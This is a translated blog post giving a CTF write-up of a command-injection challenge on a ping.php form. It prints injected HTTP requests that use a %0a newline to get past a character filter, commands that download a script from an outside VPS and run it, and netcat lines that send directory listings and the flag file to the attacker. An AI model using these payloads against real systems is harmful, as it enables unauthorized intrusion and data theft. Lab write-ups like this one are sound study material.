banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

Command Execution Bypass - Death Ping Command

#ctf#wp28
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
A friend shared a CTF challenge involving a command execution vulnerability on a website. Initial tests showed no response but confirmed command execution success. The vulnerability was tested for character filtering, revealing that characters like `;`, `` ` ``, and `$` were blocked, making DNS log techniques ineffective. However, the newline character `%0a` was found to bypass this filter. To exploit the vulnerability, the following steps were taken: 1. A VPS was set up with a script (`1.sh`) that lists directory contents and sends the output to the attacker's machine. 2. The attacker used `nc` to listen for requests and a Python server to serve the script. 3. The target machine executed a command to download and run the script. To retrieve the flag, the script was modified to read the flag file and send it back to the attacker. The process was repeated successfully to obtain the flag.

297a673a89db936acaa55bac560f989

A friend sent me a CTF challenge. When I opened the website, it was clear that there was a command execution vulnerability.

Pasted image 20241115170827

The packet capture test showed no echo, but it indicated that the command execution was successful.

Pasted image 20241115170856

The request is as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 12
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1

Testing which characters are filtered, it was found that the following characters were filtered, thus blocking the method of using DNS log.

;`$

Pasted image 20241115170926

Pasted image 20241115170956

The method of using DNS log typically involves using angle brackets for command execution, such as

`whoami`.xxx.dnslog.cn

It was found that % was not filtered and could bypass command execution using %0a (newline character).

  1. Prepare a VPS server and create a script named 1.sh on the VPS with the following content:
ls / | nc vps_address 1234
  1. On the VPS, use nc to listen for requests and open a new window to start a Python server to allow the target machine to download the 1.sh script:
nc -lvnp 1234

python3 -m http.server 80
  1. The target machine executes the following command:
ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh
chmod 777 /tmp/4.sh
/bin/sh /tmp/4.sh

The request is as follows:

POST /ping.php HTTP/1.1
Host: ctf.zhibangyang.cn:20508
Content-Length: 50
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://ctf.zhibangyang.cn:20508
Referer: http://ctf.zhibangyang.cn:20508/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/4.sh

Pasted image 20241115172903

The result is as follows, and the request can be returned.

c7a4bf2d2d68349b0d31078e064e410

To view the flag, simply modify the content of the 1.sh script as follows:

cat /FLAG | nc vps_address 1234

Run through it again to obtain the flag:

ip=127.0.0.1%0acurl vps_address/1.sh > /tmp/5.sh
chmod 777 /tmp/5.sh
/bin/sh /tmp/5.sh

490d14b6eac008d7954445c85e0e895

Based on the format of the flag, I know the question on n1book.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.